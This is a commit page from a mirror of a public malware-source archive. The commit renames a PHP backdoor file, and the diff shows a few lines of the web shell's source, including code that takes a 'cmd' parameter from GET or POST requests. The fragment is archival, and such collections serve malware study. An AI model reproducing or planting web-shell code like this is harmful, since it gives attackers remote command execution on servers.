mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Rename Backdoor.PHP.Agent.bl to Backdoor.PHP.Peterson
This commit is contained in:
@@ -321,7 +321,7 @@ color=\"#008000\">berhasil diedit!</font>";
|
|||||||
bisa ditulisi!</font>";
|
bisa ditulisi!</font>";
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
// Informaçs
|
// Informaçs
|
||||||
$cmdget = '';
|
$cmdget = '';
|
||||||
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
|
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
|
||||||
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
|
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
|
||||||
Reference in New Issue
Block a user